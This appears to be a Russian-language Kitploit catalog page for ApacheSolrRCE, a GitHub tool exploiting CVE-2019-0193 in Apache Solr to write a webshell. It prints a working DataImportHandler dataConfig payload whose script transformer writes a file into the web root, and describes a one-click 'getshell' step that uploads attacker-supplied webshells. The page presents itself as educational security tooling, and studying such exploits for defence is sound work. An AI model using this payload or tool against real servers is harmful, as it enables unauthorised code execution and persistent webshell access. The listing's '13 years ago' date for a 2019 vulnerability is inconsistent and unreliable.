Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/freefv/apachesolrrce
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubfreefv/apachesolrrce

ApacheSolrRCE

ApacheSolrRCE (CVE-2019-0193) Однокнопочное написание шелла, принцип - запись мала через поток java-файлов, выполняемый кодом.

Репозиторий
13 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Заявление о проекте

Только для учебных целей в области информационной безопасности, не используйте для незаконного тестирования и атак.

ApacheSolrRCE

ApacheSolrRCE (CVE-2019-0193) — однокнопочная запись shell, принцип заключается в записи через поток файлов Java при выполнении кода.

Примечание: автор довольно неопытен, если у вас есть баги или другие потребности, скачайте код и исправьте самостоятельно.

Описание инструмента

Поскольку payload, циркулирующие в интернете, являются выполнением команд и неудобны для получения веб-шелла, я написал этот payload (при ответе 123456 означает успешную запись).

Примечание: инструмент только для вспомогательного тестирования; если инструмент не может записать, рекомендуется делать это вручную.

root@kitploit:~
<dataConfig>
<dataSource name="streamsrc" type="ContentStreamDataSource" loggerLevel="TRACE" />
  <script><![CDATA[
          function poc(row){
var buf = new java.io.BufferedWriter(new java.io.FileWriter(java.net.URLDecoder.decode(java.lang.Thread.currentThread().getContextClassLoader().getResource("").getPath().toString().replaceAll("file:\/", "").split("WEB-INF")[0]+"1.txt")));buf.write(new java.lang.String(java.util.Base64.getDecoder().decode("MTIzNDU2")));buf.close();
row.put("title",123456);
return row;

}

]]></script>

<document>
    <entity
        stream="true"
        name="entity1"
        datasource="streamsrc1"
        processor="XPathEntityProcessor"
        rootEntity="true"
        forEach="/RDF/item"
        transformer="script:poc">
             <field column="title" xpath="/RDF/item/title" />
    </entity>
</document>
</dataConfig>

Использование инструмента

Сначала нажмите «Проверка», чтобы получить core и определить наличие уязвимости.

Затем нажмите getshell.

Примечание: поместите ваш веб-шелл в каталог shell, инструмент автоматически загрузит его в выпадающий список.

По умолчанию используется HTTP-прокси, порт 8080, это жестко закодировано в коде; если нужно, скомпилируйте и измените самостоятельно.

Особая благодарность

solr_exploit

Скачать инструмент